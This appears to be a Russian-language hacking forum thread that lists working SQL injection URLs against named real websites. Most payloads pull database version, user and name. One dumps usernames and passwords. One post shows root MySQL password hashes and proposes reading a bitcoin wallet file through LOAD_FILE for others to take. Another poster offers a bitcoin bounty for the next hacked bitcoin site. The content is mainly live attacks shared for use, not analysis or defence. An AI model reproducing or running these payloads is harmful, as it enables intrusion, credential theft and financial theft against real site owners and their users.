Code: http://www.perthanddistrictanglersassociation.com/News.php?newsID=-87+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--
Вот знаете, утро как-то сразу задалось настроение прям радостное сразу. Официальный сайт Анфисы Чеховой: Code: www.achekhova.ru/img.php?id=-99+UNION+SELECT+1,2,3,group_concat(user(),0x3a,version(),0x3a,database())+--+&rub=press P.s. Результат в сорсе смотрите, или в URL изображения. P.p.s. Ну ловко ребята вывод ошибки скрыть попытались. Юзаем cmd+a\ctrl+a. UPD Нарыл схему DB crawlp - URL, дальше сами, а мне работать пора .) На закуску: Code: http://www.osnova-pc.ru/prosmotr_posta.php?id=-85'+UNION+SELECT+1,2,group_concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11+--+ joomla ТИЦ\PR шлак Траф 2.5 в неделю Позиции в яндексе интересные: http://pr-cy.ru/a/www.osnova-pc.ru
http://bitvisitor.com/ - заработай биткоины за просмотр сайтов на главной в заголовке Referer MySQL AND/OR time-based blind web server operating system: Linux Debian 6.0 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 banner: '5.1.66-0+squeeze1-log' current user: root database management system users password hashes: [*] root [2]: password hash: *AC3AC8E16952F531C8E9FE03ECD18DA0E0E771C7 password hash: *ED5785C53CE4F9F7A220427C0F14905F92E6695B File_Priv=Y можно LOAD_FILE('**********/.bitcoin/wallet.dat') на кошеле половинка биткоина (~100$) я не трогал, кто хочет заработать вперед
ТЕХНО-М Code: http://www.techno-m.ru/index.php?prod=93[COLOR=Red]+order+by+8+--+[/COLOR] Hi-tec.com.ua Code: http://hi-tec.com.ua/index.php?idmainproduct=-91+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hiteccomua_kbt.kbt_user%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,uname,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
time-based blind http://www.bitcoinlivebets.com/index.php?action=livewetten&qf=%22%2b(select(0)from(select(sleep(6)))v)%2b%22&u=livebereich биткоэны Отаке! КОНКУРС: кто постит следующую уязвимость на Биткоен сайте получает от меня 1 BTC ~ 197$ (начало 31.10.13, конец 02.11.13) P.S. ОБЯЗАТЕЛЬНО!!! присутствие слова bitcoin в названии сайта.
www.igornikolaev.ru Офф сайт Игоря Николаева PHP: http://www.igornikolaev.ru/music/textout.php?id=94+or+1+group+by+concat((<sql>),0x00,floor(rand(0)*2))having+min(0)+or+1--+ db 5 version CY:130||PR: ================================================== www.inconnect-group.ru PHP: http://www.inconnect-group.ru/pressrelease/?id=96+limit+0,0+union+select+1,2,3,4,<sql>,6,7,8,9--+ db 5 version CY:700||PR:5 ================================================== www.agidis.ru PHP: http://www.agidis.ru/?id=98+or+1+group+by+concat((<sql>),0x00,floor(rand(0)*2))having+min(0)+or+1--+ db 5 version CY:30||PR:2 ================================================== www.landscrona.ru PHP: http://www.landscrona.ru/tales/index.php?id=115+limit+0,0+union+select+1,2,<sql>,4,5,6,7,8,9,10,11,12,13,14,15,16--+ db 5 version CY:450||PR:4 ==================================================
Code: http://www.northernoutpost.com/news.php?id=13+AND+1=2+UNION+SELECT+1,2,3,version%28%29,5,6,7,8+--+ Code: http://www.almarecords.com/news.php?id=39+AND+1=2+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11+--+
Code: http://www.pangeaday.org/filmDetail.php?id=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.lukoil.ro/statii.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+
Code: http://www.asmube.com.br/noticias.php?id=-11+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7/* Code: http://www.licafusa.com.br/galeriadoscampeoes.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4-- Code: http://www.noborder.org/item.php?id=-383+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Code: http://www.rusderjavnaya.info/article.php?art_id=758+and+1=0+union+select+1,version%28%29+--+ Code: http://www.diavia.ru/index.php?art_id=-6997+union+select+1,2,3,version%28%29,5,6,7+--+&p_id=6894&PHPSESSID=25e142491b9349684dbe1cb0c7216bdd 4.0.26-log
Host: _http://dumskaya.net Injection: Code: http://dumskaya.net/post/-1%27+or+1=if(substr((@@version),1,1)=5,1,2)+--+/ version() = 5.01 TYC = 1000 PR = 5
http://www.kdoexpo.com/cadeau-cadre-photo-numerique-pfx-1000.php?id=199+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+LIMIT+1,1-- 4.0.25-standard-log:kdoexpo:[email protected]